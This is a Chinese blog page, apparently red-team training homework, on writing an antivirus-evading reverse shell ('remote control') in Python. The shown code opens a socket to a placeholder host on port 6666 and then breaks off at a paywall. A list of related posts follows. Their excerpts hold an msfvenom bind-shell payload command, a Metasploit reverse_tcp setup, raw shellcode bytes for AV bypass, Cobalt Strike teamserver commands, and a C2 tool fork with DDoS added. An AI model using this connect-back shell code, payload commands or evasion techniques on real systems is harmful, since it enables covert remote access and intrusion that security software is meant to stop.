红队作业 | Python实现免杀远控

最新推荐文章于 2025-06-07 10:24:29 发布
最新推荐文章于 2025-06-07 10:24:29 发布
阅读量977 收藏 7
点赞数
CC 4.0 BY-SA版权
文章标签: 网络 python socket java linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/shuteer_xu/article/details/121710171
本文介绍了如何使用Python实现一个简单的免杀远程控制功能,即反弹shell。内容涉及TCP长连接、异常处理、服务端命令执行及回显。通过netcat工具进行测试,同时探讨了代码优化和免杀的可能性,以及可能的应用场景,如配合计划任务执行和上线提醒功能。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章来源|MS08067 红队培训班 第4期

本文作者:学员A(红队培训班4期学员)


按老师要求尝试完成布置的作业如下:

要想实现简易远控,说的详细点就是反弹shell,首先要解决三个问题:

1.与服务端建立socket连接

2.在服务端命令执行

3.服务端把回显返回给客户端

这里我们用python实现,声明一下,涉及到的内容是网络编程,以下函数实现多半都是我百度的,所以有很多用法以及逻辑的实现都是欠考虑的QAQ

0x01 代码实现

#以下提到客户端/服务端均为相对概念
import socket
import sys
import subprocess


s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)#建立socket服务器,两个参数分别代表ipv4,tcp连接,套用模板不解释


try:                                                #异常处理,屏蔽两种报错1.服务端主动连接目标积极拒绝 2.系统命令执行错误
    s.connect(('x.x.x.x', 6666))             #主动连接目标ip+端口,注意里面是个元组
    while True:                                   &nbs
最低0.47元/天 解锁文章

200万优质内容无限畅学
Ms08067红队学员 “红蓝实战对抗”报告
Ms08067安全实验室
12-23 1008
MS08067红队攻防从第二期班开始增加了“实战对抗”环节,为了模拟真实环境将采用两个不同的云服务提供商搭建真实环境,将同学分为AB两队,一攻一守,实现既有攻击也要有防御更要有反制的全面内...
实战多种方式实现
Ms08067安全实验室
01-28 1571
文章来源|MS08067 红队培训班 第5期本文作者:山(红队培训班5期学员)作业的思路是实现制端(Server)对受端(Client)的制;在作业中,将以python代码 以及...
30.专题(30)-Python加载shellcode-8种方式(VT率10-69)1
08-03
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!文章打包下载及相关软件下载: ht
python
weixin_43152809的博客
07-13 793
最近学习的过程中,发现python的匿名函数很适合用于python中,除了一般使用def定义的函数外,还有一种使用lambda定义的匿名函数。这种函数可以用在任何普通函数可以使用的地方,但在定义时被严格限定为单一表达式。从语义上讲,它只是普通函数的语法糖。 我的理解,匿名函数就是另外一个函数的隐含调用 下方func处无论是什么内容,都会返回system这个字符串 如果把执行内容换成whoami 如下方代码段所示: 运行就可以获取whoami信息...
Supershell二开升级,隐匿性++安卓端apk+DDOS咱都要~~~
最新发布
weixin_44993475的博客
06-07 947
想必各位师傅都用过Supershell吧,如果没用的话应该有听过吧,如果没有听过,那现在就听过啦。Supershell是一个通过WEB服务访问的C2平台,通过建立反向SSH隧道,获取完全交互式Shell,支持多平台架构Payload光看github那1.6kstar星星就知道有多少使用者啦正因为其使用广泛,工具的特征也被诸多软直接标记,为了更好的使用该工具,鄙人对其做了部分更新:v3.0.1(二开升级) 2025-06-5✓ 增加DDOS攻击✓ 增加可直接生成APK。
Python安全之编写反弹连接‘’后门
weixin_43853965的博客
01-07 1502
生成后门的工具: 虽然在WEB安全专栏,不过今天要编写的是一个二进制后门,而不是WEB后门。按惯例还是来一段KALI里面的“”后门生成工具,大名鼎鼎的metasploit: 方法一msfconsole: msf5 > use windows/shell/reverse_tcp msf5 payload(windows/shell/reverse_tcp) > set lhost...
Python绝技:运用Python成为顶级黑客》 用Python实现
weixin_30746117的博客
05-28 404
1、的过程: 使用Metasploit生成C语言风格的一些shellcode作为载荷,这里使用Windows bindshell,功能为选定一个TCP端口与cmd.exe进程绑定在一起,方便攻击者程连接进行操。 输入命令: msfvenom -p windows/shell_bind_tcp LPORT=1337 -f c -o payload.c 查看该c文件: 接着在...
python打包的exe如何_Metasploit+python生成exe过360
weixin_39904116的博客
11-21 302
from ctypes import *import ctypesbuf= ""buf+= "\xbb\x7a\x62\x0a\x22\xdb\xc9\xd9\x74\x24\xf4\x58\x29"buf+= "\xc9\xb1\x97\x31\x58\x15\x03\x58\x15\x83\xe8\xfc\xe2"buf+= "\x8f\xdc\x50\xbc\x22\x5d\xbf\x0c...
内网神器cobaltstrike使用教程
hackzkaq的博客
11-17 8071
搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具 一、安装使用 安装 系统环境:需要java环境Oracle Java 1.8,Oracle Java 11 下载解压就可以使用 使用 首先要运行服务端,如果你有个外网的机器,可以把服务端运行于外网的机器上,也可以运行于本地 服务端启动命令 windows 运行teamserver.bat teamserver.bat 1.1.1.1 123456 linux 需要有足够权限,可以通过chmod +x teamserver 来提高权限 ./tea
OSCS开源安全周报第 56 期:Apache Airflow Spark Provider 任意文件读取漏洞
zz12345600354的博客
04-26 919
OSCS 社区共收录安全漏洞 3 个,公开漏洞值得关注的是 Apache NiFi 连接 URL验证绕过漏洞(CVE-2023-40037)、PowerJob 未授权访问漏洞(CVE-2023-36106)、Apache Airflow SparkProvider 任意文件读取漏洞(CVE-2023-40272)。针对 NPM 、PyPI 仓库,共监测到 81 个不同版本的毒组件,其中 NPM 组件包 mall-front-babel-directive。
python打包的exe如何_CS强化_python
weixin_39947314的博客
11-26 785
CS作为主流红队工具,其在后渗透中的地位自不用说,功能强大,但如何让它活下去就成了个人发挥的内容,今天我们以python payload为例展开。payload生成通过cs自动生成我们python payload:值得一提的是360、电脑管家等均为对该payload报毒,倒是Windows Defender觉得事情没那么简单,显然不装毒软件的PC是最难搞的23333,因为它会默认开启Window...
使用Python进行防病毒解析
09-18
主要介绍了使用Python进行防病毒,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
如何使用Python进行Payload
11-20 769
很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到恶意行为。在探讨一个权限维持技巧的时候,似...
python打包的exe如何_使用Python进行防病毒
weixin_39979167的博客
11-21 932
很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被掉?打造的payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。0x01 环境准备1、软件安装Python 2.7.16 x86:ht...
python打包的exe如何_使用Python进行防病毒解析
weixin_39984952的博客
11-21 1443
很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被掉?打造的payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。0x01 环境准备1、软件安装2、msfvenom生成Python P...
红队作业 | MSF源码级别实录
Ms08067安全实验室
11-24 1480
文章来源|MS08067 红队培训班 第4期本文作者:学员A(红队培训班4期学员)按老师要求尝试完成布置的作业如下:对于msf生成的shellcode都是一样的。所以从代码层面来讲来说,不...
地狱修炼之路—Python领域!
qq_43606723的博客
08-18 389
文章内容仅用于技术交流学习,禁止用于非法用途,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果,均由使用者本人负责,文章作者不为此承担任何责任。基于Python网络编程。.........
从入门到实践(5)-代码篇-Python
weixin_46236101的博客
03-13 1301
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 《从入门到实践》系列文章目录: 1、从入门到实践 (1)基础篇 2、从入门到实践 (2)工具总结篇 3、从入门到实践 (3)代码篇-C/C++ 4、从入门到实践 (4)代码篇-C# 5、从入门到实践 (5)代码篇-Python 6、从入门到实践 (6)代码篇-Powershell 7、从入门到实.
分享一个的反弹shell工具(python脚本转换成exe)
weixin_30339457的博客
07-21 730
有时候网站服务器上有毒软件,我们上传的nc.exe、lcx.exe等工具都被了,这时候就需要一款的工具来反弹shell。 这篇博客主要是依据国外的一片文章翻译而来,根据国外大佬的教程将Python脚本转换成exe程序即可。 参考链接:https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295c...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值